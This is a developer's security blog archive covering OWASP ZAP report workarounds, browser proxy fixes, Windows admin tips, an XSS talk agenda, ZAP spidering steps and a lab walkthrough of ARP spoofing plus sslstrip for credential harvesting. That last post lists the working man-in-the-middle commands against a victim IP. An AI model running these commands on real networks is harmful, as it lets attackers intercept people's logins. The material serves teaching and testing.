Computers, Programming, Technology, Music, Literature

Practical Security Testing For Developers Using OWASP ZAP at Dot Net Bangalore 3rd meet up on Feb 21 2015

Title: Practical Security Testing for Developers using OWASP ZAP

Abstract: Every time an application faces the world wide web, it inherently becomes vulnerable to attacks. The attackers range from script kiddies and joyriders to hobbyists turned downright hostile. The earlier in the development cycle you find the vulnerabilities, the easier they are to fix and test. OWASP ZAP is a free and open source penetration testing tool for finding vulnerabilities in web applications; widely used by security professionals, it is also ideal for anyone new to web application security and includes features specifically aimed at developers. This session demonstrates some attacks against web applications and how OWASP ZAP can be used to find those vulnerabilities, both manually and from automated builds.

Gist: See live attacks against web applications and how OWASP ZAP can be used to find those vulnerabilities, both manually and from automated builds.

Speaker: Marudhamaran Gunasekaran

Time & Venue: 21 Feb 2015 @ Dot Net Bangalore 2nd meet up

OWASP ZAP : Workaround – Html Report from APIs daemon mode

Ok, maybe the title is a bit misleading. The post below shows a few workarounds you can use to generate (or mimic) an html report when running OWASP ZAP automated in headless mode.

Zed Attack Proxy (ZAP), as of the 2.3.1 stable release, provides options to generate an Xml report and an html report for the alerts found. We can get these two reports from the UI via the Report menu.

Use case:

One of the unique features of ZAP is the REST API that aids in automating scans. When running ZAP in daemon mode and driving it through the REST APIs, there are a number of ways to harvest the alerts identified by ZAP.

Here’s a couple of them:

  1. alerts based on id (http://localhost:7070/UI/core/view/alert/)
  2. alerts for the baseurl (http://localhost:7070/UI/core/view/alerts/)
  3. xmlreport (http://localhost:7070/UI/core/other/xmlreport/) [Same as clicking Report –> Generate Xml Report…]

Using the API and your favorite programming language, you could very well gather the alerts and decide what you want to do with them.

Problem:

One convenience would be to simply pull an html report out of the scan and mail it to the application owners or to ourselves, so that the findings can be fixed. There is an enhancement request open on the project page – https://code.google.com/p/zaproxy/issues/detail?id=1355

Until the feature is available in the next stable release, I decided to live with a couple of workarounds. There is a workaround in python, and there is also a workaround in exe format (written in C#). They are not perfect in terms of formatting, but they are close enough to the original html report generated through the ZAP UI.

Workarounds:

Download from here – https://github.com/gmaran23/HtmlReportThroughZapAPIs

Workaround #1:

A python script that injects an xml-stylesheet processing instruction, pointing at an xslt file, into the xml report file generated through the API. Use the sample function to reference the sample stylesheet (ZapReport.xslt) from the generated xml file. Needless to say, ZapReport.xslt and the xml report file should be in the same location.

If you need to email the xml report, zip it together with the xslt file, so that when unzipped the xslt file sits in the same location as the xml file.

When the xml file is opened in Firefox or IE, see the formatting in action! (Does not work in Chrome, though.)

import io

def InsertXSLTSheetIntoXmlReport(xmlreportfile, xsltfile, xmlreportfileout):
    # The ZAP xml report starts with exactly this declaration; the xml-stylesheet
    # processing instruction has to come right after it, so the declaration is
    # replaced with itself followed by the instruction.
    texttofind = '<?xml version="1.0" encoding="UTF-8"?>'
    texttoreplace = '<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="{0}" ?>'.format(xsltfile)
    with io.open(xmlreportfile, 'r', encoding="utf8") as f:
        xmlreport = f.read()
    # Fail loudly instead of silently writing an unchanged copy when the
    # declaration differs (for example a report saved with different quoting).
    if texttofind not in xmlreport:
        raise ValueError('xml declaration not found in ' + xmlreportfile)
    xmlreportstyleinserted = xmlreport.replace(texttofind, texttoreplace, 1)
    with io.open(xmlreportfileout, 'w', encoding="utf8") as f:
        f.write(xmlreportstyleinserted)


InsertXSLTSheetIntoXmlReport('SampleOWASPZAPReport.xml', 'ZapReport.xslt', 'SampleOWASPZAPReport-Mod.xml')

There is also another xslt template available from https://code.google.com/p/zaproxy/source/browse/trunk/src/xml/report.html.xsl
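As an added example (not code from this post and not part of the HtmlReportThroughZapAPIs project), here is a stylesheet-free way to do what the "Use case" list and Workaround #1 above describe: take the xml report that the xmlreport API endpoint (or Report –> Generate Xml Report…) produces, summarize the alerts by risk, decide whether an automated build should fail, and render a minimal html report. The sample report embedded below is constructed, and its element layout (OWASPZAPReport > site > alerts > alertitem with pluginid, alert, riskcode, riskdesc, desc, uri, param, evidence, solution) is an assumption about the reports of that ZAP version; adjust FIELDS and COLUMNS if your report differs. The part worth noticing is that every value goes through html.escape: uri, param and evidence carry the very payloads ZAP found on the target, so an unescaped report mailed to the application owners would be an XSS vector of its own.

```python
import html
import xml.etree.ElementTree as ET

# Constructed sample in the shape of a ZAP xml report; not output from a real scan.
SAMPLE_XML_REPORT = """<?xml version="1.0" encoding="UTF-8"?>
<OWASPZAPReport version="2.3.1" generated="Sat, 10 Jan 2015 10:00:00">
  <site name="http://localhost:8080" host="localhost" port="8080" ssl="false">
    <alerts>
      <alertitem>
        <pluginid>40012</pluginid>
        <alert>Cross Site Scripting (Reflected)</alert>
        <riskcode>3</riskcode>
        <riskdesc>High (Medium)</riskdesc>
        <desc>User input is reflected unencoded into the page.</desc>
        <uri>http://localhost:8080/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E</uri>
        <param>q</param>
        <evidence>&lt;script&gt;alert(1)&lt;/script&gt;</evidence>
        <solution>Encode output for the HTML context it is written into.</solution>
      </alertitem>
      <alertitem>
        <pluginid>10021</pluginid>
        <alert>X-Content-Type-Options Header Missing</alert>
        <riskcode>1</riskcode>
        <riskdesc>Low (Medium)</riskdesc>
        <desc>The anti-MIME-sniffing header is not set.</desc>
        <uri>http://localhost:8080/</uri>
        <param></param>
        <evidence></evidence>
        <solution>Send X-Content-Type-Options: nosniff.</solution>
      </alertitem>
    </alerts>
  </site>
</OWASPZAPReport>
"""

RISK_NAMES = {0: "Informational", 1: "Low", 2: "Medium", 3: "High"}
# Assumed alertitem children; riskcode is handled separately as an int.
FIELDS = ("pluginid", "alert", "riskdesc", "desc", "uri", "param", "evidence", "solution")
COLUMNS = ("alert", "riskdesc", "uri", "param", "evidence", "solution")


def parse_alerts(xml_text):
    """One dict per <alertitem>, with the owning site's name attached."""
    root = ET.fromstring(xml_text)
    alerts = []
    for site in root.findall("site"):
        for item in site.findall("./alerts/alertitem"):
            alert = {f: (item.findtext(f) or "") for f in FIELDS}
            alert["riskcode"] = int(item.findtext("riskcode") or 0)
            alert["site"] = site.get("name", "")
            alerts.append(alert)
    return alerts


def summarize(alerts):
    """Count alerts per risk level, e.g. {'High': 1, 'Low': 1, ...}."""
    counts = dict.fromkeys(RISK_NAMES.values(), 0)
    for a in alerts:
        counts[RISK_NAMES.get(a["riskcode"], "Informational")] += 1
    return counts


def should_fail_build(alerts, max_allowed_risk=2):
    """Build gate: any alert above max_allowed_risk (default: anything High) fails the build."""
    return any(a["riskcode"] > max_allowed_risk for a in alerts)


def render_html(alerts):
    """Minimal html report, highest risk first. Every value is escaped because
    uri, param and evidence contain the payloads ZAP sent to the target."""
    rows = []
    for a in sorted(alerts, key=lambda x: -x["riskcode"]):
        cells = "".join("<td>%s</td>" % html.escape(a[c]) for c in COLUMNS)
        rows.append("<tr>%s</tr>" % cells)
    summary = "".join("<li>%s: %d</li>" % (name, n) for name, n in summarize(alerts).items())
    head = "".join("<th>%s</th>" % c for c in COLUMNS)
    return ('<!DOCTYPE html><html><head><meta charset="utf-8"><title>ZAP Scan Report</title></head>'
            '<body><h1>ZAP Scan Report</h1><ul>%s</ul><table border="1"><tr>%s</tr>%s</table></body></html>'
            % (summary, head, "".join(rows)))


if __name__ == "__main__":
    found = parse_alerts(SAMPLE_XML_REPORT)
    with open("SampleOWASPZAPReport.html", "w", encoding="utf-8") as out:
        out.write(render_html(found))
    print(summarize(found), "fail build:", should_fail_build(found))
```

In a build, should_fail_build is the value you turn into a non-zero exit code; the threshold is a parameter so a team can start by failing only on High and tighten it later.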

Workaround #2:

Use the command line program named XmlToHtmlWithXSLT.exe (requires .Net 4.0) as below to obtain a html report as output.

XmlToHtmlWithXSLT.exe SampleOWASPZAPReport.xml ZapReport.xslt converted.html

If you don’t have .Net 4.0, use the source below to recompile to any .Net version.

using System;
using System.IO;
using System.Text;
using System.Xml;
using System.Xml.Xsl;

namespace XmlToHtmlWithXSLT
{
    // Usage: XmlToHtmlWithXSLT.exe <report.xml> <stylesheet.xslt> <output.html>
    class Program
    {
        static void Main(string[] args)
        {
            if (args.Length != 3)
            {
                Console.WriteLine("Usage: XmlToHtmlWithXSLT.exe <report.xml> <stylesheet.xslt> <output.html>");
                return;
            }

            string inputXmlFileName = args[0];
            string xsltfile = args[1];
            string outputHtmlFileName = args[2];

            XslCompiledTransform transform = LoadXsltTransform(xsltfile);

            StringWriter transformedToHtml = ApplyXsltTransform(inputXmlFileName, transform);

            WriteHtmlToFile(outputHtmlFileName, transformedToHtml);

            PrintStatus(outputHtmlFileName);
        }

        // Compiles the stylesheet. DtdProcessing.Ignore skips any DTD, so no external
        // entities are resolved while reading it; script blocks and the document()
        // function stay disabled because Load is called without XsltSettings.
        private static XslCompiledTransform LoadXsltTransform(string xsltfile)
        {
            XslCompiledTransform transform = new XslCompiledTransform();
            using (XmlReader reader = XmlReader.Create(xsltfile, new XmlReaderSettings() { DtdProcessing = DtdProcessing.Ignore }))
            {
                transform.Load(reader);
            }
            return transform;
        }

        // Runs the transform over the report. The report's text comes from the scanned
        // site, so it is read with the same DTD-ignoring settings.
        private static StringWriter ApplyXsltTransform(string inputXmlFileName, XslCompiledTransform transform)
        {
            StringWriter transformedToHtml = new StringWriter();
            using (XmlReader reader = XmlReader.Create(inputXmlFileName, new XmlReaderSettings() { DtdProcessing = DtdProcessing.Ignore }))
            {
                transform.Transform(reader, null, transformedToHtml);
            }
            return transformedToHtml;
        }

        private static void WriteHtmlToFile(string outputHtmlFileName, StringWriter transformedToHtml)
        {
            using (StreamWriter outputFileStream = new StreamWriter(new FileStream(outputHtmlFileName, FileMode.Create)))
            {
                outputFileStream.Write(transformedToHtml.ToString());
            }
        }

        private static void PrintStatus(string outputHtmlFileName)
        {
            Console.WriteLine("Output Written to {0}", outputHtmlFileName);
        }
    }
}

Until the enhancement request (https://code.google.com/p/zaproxy/issues/detail?id=1355) is completed, these are some workarounds that I personally can live with; maybe you can too, for your automation needs.

Worth looking at – https://www.owasp.org/index.php/GSoC2013_Ideas/OWASP_ZAP_Exploring_Advanced_reporting_using_BIRT

Written by gmaran23

January 13, 2015 at 9:52 pm

Plug-n-Hack and ZAP: manually changed proxy settings after initial pnh configuration

Plug-n-Hack introduces and proposes new standards to integrate security tools with browsers, enabling communication between them. OWASP ZAP has inbuilt support for Plug-n-Hack (pnh), which allows you to configure Firefox to change its proxy settings so that OWASP ZAP can watch the Firefox traffic.

Configuration is child's play. Point your browser to the ZAP proxy address, follow the instructions, and you are done, just like the gif below shows.

This changes Firefox to use a proxy configuration provided via the http://localhost:7070/proxy.pac file.

All works.

But, out of curiosity, if you went and changed the Firefox proxy settings to No Proxy, Auto-detect proxy settings for this network or Use system proxy settings, then the Firefox traffic would not be proxied through ZAP, which is expected, right? That works just fine.

However, when you want Firefox traffic to be proxied through ZAP again, you would copy-paste the ZAP proxy address (http://localhost:7070/pnh) into Firefox again, and Firefox would then say: A provider with this name has already been configured.

What is your expectation now?

I don’t know; as a user, my expectation when I pasted the http://localhost:7070/pnh URL into Firefox is that it should configure my browser to route its traffic via ZAP. But that does not happen.

How to fix?

You can override the proxy settings yourself. Or you could actually use pnh to clear and remove the configuration and then point Firefox to http://localhost:7070/pnh again.

Press Shift + F2 in Firefox and run these two commands:

pnh config clear 'OWASP ZAP'

pnh config remove 'OWASP ZAP'

Written by gmaran23

November 19, 2014 at 6:13 pm

Windows: Get MAC address from the command line

Windows changes with every version and the UI gets more and more twisted, but for a computer user who works from the command line for administrative tasks, things are pretty much the same.

If you want to gather the list of MAC addresses on a particular computer, run either of the below commands:

  1. getmac

getmac

  2. Filter the output of ipconfig -all:

ipconfig -all | find /i "Physical Address"
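As an added example (not from the post), a parser for the ipconfig -all output that the find command above filters, for the case where a script needs the address per adapter rather than a line on screen. The sample output below is constructed, not captured from a real machine; the adapter names and addresses in it are made up. It also shows the edge case the find filter does not handle: tunnel adapters (ISATAP, Teredo) report an 8-octet pseudo address, which ethernet_macs drops.

```python
import re

# Constructed, abridged "ipconfig -all" output; adapter names and addresses are made up.
SAMPLE_IPCONFIG = """Windows IP Configuration

   Host Name . . . . . . . . . . . . : WORKSTATION01

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : example.local
   Description . . . . . . . . . . . : Intel(R) 82579LM Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-1A-2B-3C-4D-5E
   DHCP Enabled. . . . . . . . . . . : Yes

Wireless LAN adapter Wireless Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Description . . . . . . . . . . . : Intel(R) Centrino(R) Advanced-N 6205
   Physical Address. . . . . . . . . : A4-B5-C6-D7-E8-F9

Tunnel adapter isatap.example.local:

   Media State . . . . . . . . . . . : Media disconnected
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
"""

# Adapter headings start in column 0 and end with a colon: "<kind> adapter <name>:"
ADAPTER_RE = re.compile(r"^(\S.*adapter (.+)):\s*$")
# Property lines are indented; the value follows the dotted leader and a colon.
PHYSICAL_RE = re.compile(r"^\s*Physical Address[ .]*: ([0-9A-Fa-f-]+)\s*$")


def parse_ipconfig(text):
    """Map adapter name -> physical address, in the order ipconfig lists them."""
    result = {}
    current = None
    for line in text.splitlines():
        heading = ADAPTER_RE.match(line)
        if heading:
            current = heading.group(2)
            continue
        physical = PHYSICAL_RE.match(line)
        if physical and current:
            result[current] = physical.group(1).upper()
    return result


def ethernet_macs(text):
    """Only 48-bit (6-octet) addresses; tunnel adapters report 8-octet pseudo addresses."""
    return {name: mac for name, mac in parse_ipconfig(text).items() if len(mac.split("-")) == 6}


if __name__ == "__main__":
    for name, mac in ethernet_macs(SAMPLE_IPCONFIG).items():
        print(name, mac)
```

On a live machine, feed it subprocess.run(["ipconfig", "-all"], capture_output=True, text=True).stdout instead of the sample string.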

Written by gmaran23

November 6, 2014 at 2:37 pm

Posted in Windows

Process Explorer vs Process Hacker–Part 1 of 2

Originally posted on chentiangemalc:

Process Explorer the tool we’ve all come to love as “Task Manager on Steroids” has been for many IT pros one of the essential tools in their troubleshooting toolkit. Process Explorer was originally released in 1998 under the name NTHandlEx. Here is a screenshot of version 1.22. Notice the lack of processes in Windows NT 4.0!

By version 2.01 it had been renamed to HandleEx and had added some more process properties and a kill feature.

It wasn’t until 16 June 2001 when Version 5.0 came out that it got renamed to Process Explorer. ( I was hoping to have a screenshot of this version as well but couldn’t find it anywhere…) In any case as of May 2011 with version 14.12 the tool has come a long way to be one of the most advanced “task manager” tools available:

However an open source project has been working on a competing product since…

Written by gmaran23

September 28, 2014 at 1:27 pm

Posted in Uncategorized

Process Explorer vs Process Hacker–Part 2 of 2

Originally posted on chentiangemalc:

Continuing from Part 1 here http://chentiangemalc.wordpress.com/2011/06/13/process-explorer-vs-process-hackerpart-1-of-2/ we will now compare more advanced features of Process Explorer & Process Hacker.

Run As Options

Both Process Explorer and Process Hacker have “Run” options. Process Explorer has “Run” and “Run As Limited User”, while Process Hacker has “Run”, “Run As Limited User”, and “Run As”.

In both programs “Run As Limited User” will launch the process with “Low” integrity security level on Vista and higher.

However Process Hacker’s Run As is the most powerful with many special options…

User name can be any standard user name but also can include special accounts such as:

We can also select what “type”

Specific sessions can be targeted

as well as Desktops…

Finding Open Handles/DLLs

In Process Hacker this is found via Hacker | Find Handles or DLLs menu option, in Process Explorer it is via Find | Find Handle or DLL

The main difference here is…

Written by gmaran23

September 28, 2014 at 1:26 pm

Posted in Uncategorized

Devouring Security: Cross Site Scripting [XSS]

http://www.slideshare.net/gmaran23/insufficient-data-validation-risks-xss

Agenda:

- Risk, Stories & the news
- XSS Anatomy
- Untrusted Data Sources: Well, where did that come from?
- Shouldn’t it be called CSS instead?
- Types of XSS
  - Type 0 [DOM based]
  - Type 1 [Reflected or Non-persistent XSS]
  - Type 2 [Persistent or Stored XSS]
- Live Demo: XSS 101 with alert('hello XSS world')
- Live Demo: Cookie Hijacking and Privilege Escalation
  - Face/Off with John Travolta and Nicolas Cage
- Live Demo: Let’s deploy some key loggers, huh?
- Mitigations
  - Input Sanitization
  - Popular Libraries for .Net, Java, PHP
    - Demo: Input sanitization
  - Whitelists (vs. Blacklists)
  - Output Encoding
    - Contextual
    - Demo: Output Encoding
  - Browser Protections & bypasses
  - Framework Protections & bypasses
  - Content Security Policy (CSP) in brief
- Secure Code reviews: Spot an XSS, How?
- Tools: Do we have an option?
- XSS Buzz and how to Fuzz
- Renowned Cheat sheets
- Further reading & References


Does your Autolock Domain Workstation policy fail sometimes? But why?

This article was originally published for www.prowareness.com and could be located at http://www.prowareness.com/blog/does-your-autolock-domain-workstation-policy-fail-sometimes-but-why/

The “Password Protect Screensaver” and “Screen Saver Timeout” settings controlled by group policy make the screen saver kick in after the specified interval of inactivity; on resume, the logon screen is displayed and the workstation has to be unlocked.

Then the normal procedure, if you are doing it for the first time, is a GPUPDATE /FORCE. The policy will work as expected; however, if some users or managers keep quibbling about their workstation not locking after the specified interval, check whether any of the exceptions below apply.

  1. A video is playing in YouTube or on any website that uses a Flash-based or HTML5 video player. This has to be the active window.
  2. A video is playing in VLC or Windows Media Player. The application need not have focus; it can be inactive (minimized, or hidden in the system tray).
  3. Audio is playing in VLC or Windows Media Player. The application need not have focus; it can be inactive (minimized, or hidden in the system tray).
  4. An automated test is running: desktop app automation or browser automation.
  5. A PowerPoint slideshow is in progress.

The moment a computer is joined to a domain, the policy becomes effective; if it did not work, it is either because of the above exceptions or because the computer was not part of the domain. The exceptions hold because each of them lets the operating system know that the computer is not idle. If you think this is not the expected behaviour, think how ecstatic you’d be when your screen gets locked while you are enjoying a movie or are in the middle of a presentation.

Written by gmaran23

September 26, 2014 at 2:08 pm

Devouring Security: OWASP ZAP – Successfully Ajax Spidering a website with Authentication

OWASP ZAP – Successfully Ajax Spidering a website with Authentication (Northwind Products Management)

0. Make sure you are proxying via Zap (I love FoxyProxy)

1. Identify the session cookie

1.1 If the http session is not identified, use the Params tab and flag a Cookie as Session Token [alternatively, go to Tools -> Options... -> Http Sessions and add a session identifier]

1.2 go do some browsing

2. Set an active session from the Http Sessions tab

3. Identify and exclude the Log off request from the spider (and from the scanner and the proxy, if required)
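As an added example (not the post's own code and not ZAP's client library), the steps above expressed as calls to the ZAP REST API, the same API the html-report post further up uses for alerts. The endpoint paths (httpSessions/action/addSessionToken, httpSessions/action/setActiveSession, spider/action/excludeFromScan, ascan/action/excludeFromScan, core/action/excludeFromProxy, ajaxSpider/action/scan), the host:port form of the site parameter and the {"Result":"OK"} reply are assumptions about the ZAP API of that period; check them against the API UI at http://localhost:7070/UI/ on your own instance. The session token name and the log-off regex are made-up values for a Northwind-style ASP.NET application. The fetch function is injected so the plan can be exercised offline with the constructed stand-in; http_fetch does the real GET against the daemon.

```python
import json
from urllib.parse import quote
from urllib.request import urlopen

# Assumed daemon address, matching the port used elsewhere on this page.
ZAP = "http://localhost:7070"


def api(path, **params):
    """Build a ZAP JSON API URL; every parameter value is percent-encoded."""
    query = "&".join("%s=%s" % (k, quote(str(v), safe="")) for k, v in params.items())
    return "%s/JSON/%s/?%s" % (ZAP, path, query)


def plan(site, token_name, session_name, logoff_regex, start_url):
    """Steps 1 to 3 of the post as (description, url) pairs, in the order they must run.
    Endpoint paths are assumptions (see lead-in)."""
    return [
        # 1.1 flag the cookie as the session token for this site
        ("add session token", api("httpSessions/action/addSessionToken", site=site, sessionToken=token_name)),
        # 2. make the session captured while browsing the active one
        ("set active session", api("httpSessions/action/setActiveSession", site=site, session=session_name)),
        # 3. keep the log-off request away from the spider, the scanner and the proxy
        ("exclude log off from spider", api("spider/action/excludeFromScan", regex=logoff_regex)),
        ("exclude log off from scanner", api("ascan/action/excludeFromScan", regex=logoff_regex)),
        ("exclude log off from proxy", api("core/action/excludeFromProxy", regex=logoff_regex)),
        # then start the Ajax spider from the authenticated entry point
        ("start ajax spider", api("ajaxSpider/action/scan", url=start_url)),
    ]


def run(steps, fetch):
    """Execute the steps with fetch(url) -> response body. Stops at the first reply
    that is not {"Result": "OK"}, so a failed session setup never turns into an
    unauthenticated crawl that quietly reports 'no alerts'."""
    completed = []
    for description, url in steps:
        body = json.loads(fetch(url))
        if body.get("Result") != "OK":
            raise RuntimeError("%s failed: %s" % (description, body))
        completed.append(description)
    return completed


def http_fetch(url):
    """Real fetcher: a GET against the running ZAP daemon."""
    with urlopen(url) as resp:
        return resp.read().decode("utf-8")


def make_fake_fetch(reply='{"Result":"OK"}'):
    """Constructed stand-in for http_fetch that only records the URLs it was given."""
    calls = []

    def fetch(url):
        calls.append(url)
        return reply

    fetch.calls = calls
    return fetch


if __name__ == "__main__":
    # Made-up values for a Northwind-style ASP.NET application proxied through ZAP.
    steps = plan("localhost:8080", "ASP.NET_SessionId", "Session 1",
                 r"http://localhost:8080/Account/LogOff.*", "http://localhost:8080/")
    for done in run(steps, make_fake_fetch()):
        print("ok:", done)
```

Swap make_fake_fetch() for http_fetch to drive a real daemon; the order matters, because excluding the log-off URL after the spider has started is too late.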

Good luck with your Ajax spidering in ZAP!

Marudhamaran Gunasekaran
renouncedthoughts.wordpress.com/
vimeo.com/gmaran23

Also available on YouTube as an official OWASP ZAP video tutorial. Not so HD compared to Vimeo. Thanks to Simon Bennetts for feedback and suggestions.

Written by gmaran23

August 29, 2014 at 4:42 pm

Posted in hacks, kali, linux, OWASP, security, Sqli

Devouring Security: Sslstrip and arpspoofing for credential harvesting

You may think you are connecting to a website over SSL, but did you forget to check for https in the address bar?

http://www.thoughtcrime.org/software/sslstrip/

Victim – Windows 7 – 192.168.100.11

Attacker – Kali linux – 192.168.100.215

arpspoof gateway – 192.168.100.1

  1. Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward

  2. Run arpspoof to convince the network to send its traffic to you.

arpspoof -i <interface> -t <targetIP> <gatewayIP>

arpspoof -i eth0 -t 192.168.100.11 192.168.100.1

  3. Set up iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

  4. Run sslstrip.

sslstrip.py -l <listenPort>

sslstrip
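From the defender's side, as an added example that is not part of the post: the arpspoof step works by rewriting the victim's ARP cache so that the gateway IP maps to the attacker's MAC, and that rewrite is visible on the victim itself. The code below compares two arp -a snapshots from the Windows host (constructed in Windows output format; the MAC values are made up, the IPs are the ones used in the post) and reports two signals: the gateway's MAC differing from a known-good baseline, and the gateway's MAC being claimed by a second IP in the same table.

```python
import re

# Constructed "arp -a" snapshots in Windows format from the host the post calls the
# victim; MAC values are made up. The second snapshot shows the gateway entry
# rewritten to the MAC that 192.168.100.215 already had.
ARP_BASELINE = """
Interface: 192.168.100.11 --- 0xb
  Internet Address      Physical Address      Type
  192.168.100.1         00-50-56-aa-bb-01     dynamic
  192.168.100.215       08-00-27-11-22-33     dynamic
  192.168.100.255       ff-ff-ff-ff-ff-ff     static
"""

ARP_LATER = """
Interface: 192.168.100.11 --- 0xb
  Internet Address      Physical Address      Type
  192.168.100.1         08-00-27-11-22-33     dynamic
  192.168.100.215       08-00-27-11-22-33     dynamic
  192.168.100.255       ff-ff-ff-ff-ff-ff     static
"""

# One table row: IPv4 address, dash-separated MAC, entry type.
ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\w+)\s*$",
    re.MULTILINE)


def parse_arp(text):
    """Map IP -> lower-case MAC for every entry in an arp -a listing."""
    return {ip: mac.lower() for ip, mac, _kind in ENTRY_RE.findall(text)}


def check_gateway(baseline_text, current_text, gateway_ip):
    """Compare the gateway's MAC with a known-good baseline and look for another
    host that claims the same MAC. Returns a list of findings; empty means clean."""
    before, after = parse_arp(baseline_text), parse_arp(current_text)
    findings = []
    old, new = before.get(gateway_ip), after.get(gateway_ip)
    if old and new and old != new:
        findings.append("gateway %s changed MAC %s -> %s" % (gateway_ip, old, new))
    if new:
        sharers = sorted(ip for ip, mac in after.items() if mac == new and ip != gateway_ip)
        if sharers:
            findings.append("gateway MAC %s is also claimed by %s" % (new, ", ".join(sharers)))
    return findings


if __name__ == "__main__":
    for finding in check_gateway(ARP_BASELINE, ARP_LATER, "192.168.100.1"):
        print("ALERT:", finding)
```

A replaced router also trips the first check, which is why the second one matters: on a healthy LAN no two IPs in the table share a MAC apart from broadcast and multicast entries. On the browser side, HSTS is the counterpart to the "check for https" advice above: for a site the browser has already seen with a Strict-Transport-Security header, it refuses to follow the downgraded http:// link at all.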

Written by gmaran23

July 4, 2014 at 8:58 pm
